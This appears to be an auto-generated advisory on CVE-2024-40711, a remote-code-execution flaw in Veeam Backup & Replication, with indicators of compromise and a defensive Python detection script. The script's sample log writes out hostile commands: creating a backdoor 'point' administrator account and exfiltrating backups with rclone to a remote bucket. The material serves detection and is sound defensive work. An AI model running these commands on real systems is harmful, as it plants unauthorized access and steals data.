Full Report
CVE-2024-40711 arises from the deserialization of untrusted data in the Veeam Backup & Replication software. This vulnerability can be exploited with low-complexity attacks, making it a threat to organizations relying on Veeam’s platform for backup, disaster recovery, and data...
Analysis Summary
# Vulnerability: Deserialization of Untrusted Data in Veeam Backup & Replication Leading to RCE
## CVE Details
- CVE ID: CVE-2024-40711
- CVSS Score: Not explicitly provided in the source material; the flaw is described as low-complexity and leading to RCE, which implies High severity.
- CWE: Deserialization of Untrusted Data
## Affected Systems
- Products: Veeam Backup & Replication software
- Versions: Not specified in detail; the sources confirm only that versions susceptible to this deserialization flaw are affected.
- Configurations: Instances running Veeam Backup & Replication.
## Vulnerability Description
The vulnerability stems from the deserialization of untrusted data within Veeam Backup & Replication. Successful exploitation allows an attacker to achieve Remote Code Execution (RCE) by targeting the `Veeam.Backup.MountService.exe` process, specifically via the `/trigger` URI over port 8000. In the observed attacks, this process was then used to spawn system commands via `net.exe`.
## Exploitation
- Status: Exploited in the wild (Used by Akira and Fog ransomware groups)
- Complexity: Low
- Attack Vector: Network (likely targeting remote services)
## Impact
- Confidentiality: High (Implied by subsequent credential abuse and data exfiltration observed)
- Integrity: High (Enables arbitrary code execution and system command execution)
- Availability: High (Observed in ransomware attacks)
## Remediation
### Patches
- **No specific patch version was detailed in the provided context.** Organizations must consult official Veeam advisories for patching information.
### Workarounds
- No specific workarounds were detailed in the provided context. Given the severity and active exploitation, patching should be the immediate priority.
## Detection
- **Indicators of Compromise (IoCs):**
  - Command execution via `Veeam.Backup.MountService.exe`, reached through the `/trigger` URI over port 8000.
  - Creation of a local user account named "point" that is added to the Administrators and Remote Desktop Users groups.
  - Use of the `rclone` utility for data exfiltration following exploitation.
- **Detection Methods:** Network monitoring for traffic targeting port 8000 on Veeam services, and endpoint detection of system commands (such as `net.exe`) spawned by Veeam processes.
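The endpoint-side detection described above can be expressed as a few rules over process-creation telemetry. The following is an added example (not code from the report or from Veeam): it parses constructed, pipe-separated process-creation records (timestamp, parent image, image, command line; a simplified stand-in for a Sysmon Event ID 1 or EDR export) and flags the behaviours the report lists as IoCs: commands spawned by `Veeam.Backup.MountService.exe`, creation of a local "point" account, membership added to Administrators or Remote Desktop Users, and execution of `rclone`. The log format, rule names and sample events are assumptions made for this example.

```python
"""Detection rules for the post-exploitation behaviour described in the
CVE-2024-40711 report. Added example, not part of the original report.
The record format and sample events below are constructed for illustration."""
import re
from typing import Dict, List, Tuple

VEEAM_MOUNT_SERVICE = "veeam.backup.mountservice.exe"
# Command interpreters / utilities the mount service has no business spawning.
SHELL_OR_NET = {"net.exe", "net1.exe", "cmd.exe", "powershell.exe"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}

# net user <name> [<password>] /add   (net, net1, optional .exe, optional quote)
NET_USER_ADD = re.compile(
    r'\bnet1?(?:\.exe)?"?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b', re.I)
# net localgroup <group or "quoted group"> <member> /add
NET_GROUP_ADD = re.compile(
    r'\bnet1?(?:\.exe)?"?\s+localgroup\s+("[^"]+"|\S+)\s+(\S+)\s+/add\b', re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed record: ts|ParentImage|Image|CommandLine."""
    ts, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers (empty if benign)."""
    hits: List[str] = []
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event["cmdline"]

    # Rule 1: the Veeam mount service spawning a shell or net.exe.
    if parent == VEEAM_MOUNT_SERVICE and image in SHELL_OR_NET:
        hits.append("veeam_mountservice_spawned_command")

    # Rule 2: local account creation; the reported IoC is an account named "point".
    m = NET_USER_ADD.search(cmd)
    if m:
        hits.append("local_user_created")
        if m.group(1).lower() == "point":
            hits.append("ioc_user_point_created")

    # Rule 3: membership added to Administrators or Remote Desktop Users.
    m = NET_GROUP_ADD.search(cmd)
    if m and m.group(1).strip('"').lower() in PRIVILEGED_GROUPS:
        hits.append("privileged_group_membership_added")

    # Rule 4: rclone execution, the exfiltration tool named in the report.
    if image.startswith("rclone"):
        hits.append("rclone_execution")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Evaluate every record and return (timestamp, triggered rules) for hits."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        hits = evaluate(ev)
        if hits:
            findings.append((ev["ts"], hits))
    return findings


# Constructed sample telemetry (not real logs): three net.exe children of the
# mount service, one benign event, and one rclone run from a user profile.
VEEAM_PATH = "C:\\Program Files\\Veeam\\Backup and Replication\\Backup\\Veeam.Backup.MountService.exe"
SAMPLE_LOG = "\n".join([
    f"2024-10-10T08:00:01Z|{VEEAM_PATH}|C:\\Windows\\System32\\net.exe|net user point P@ssw0rd /add",
    f"2024-10-10T08:00:02Z|{VEEAM_PATH}|C:\\Windows\\System32\\net.exe|net localgroup Administrators point /add",
    f'2024-10-10T08:00:03Z|{VEEAM_PATH}|C:\\Windows\\System32\\net.exe|net localgroup "Remote Desktop Users" point /add',
    "2024-10-10T08:05:00Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe",
    "2024-10-10T09:12:44Z|C:\\Windows\\System32\\cmd.exe|C:\\Users\\point\\rclone.exe|rclone.exe copy D:\\Backups remote:bucket",
])

if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_LOG.splitlines()):
        print(ts, ", ".join(hits))
```

Rule 1 is the highest-signal item: a backup mount service has no legitimate reason to launch `net.exe` or a shell, so that parent/child pair alone warrants an alert, with rules 2 to 4 adding context on what the spawned commands did. In production, feed the parser from your EDR or Sysmon export and keep the parent-image comparison case-insensitive, as done here.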
## References
- hxxps://infosec.exchange/@SophosXOps/113284564225476186
- hxxps://www.bleepingcomputer.com/news/security/akira-and-fog-ransomware-now-exploiting-critical-veeam-rce-flaw/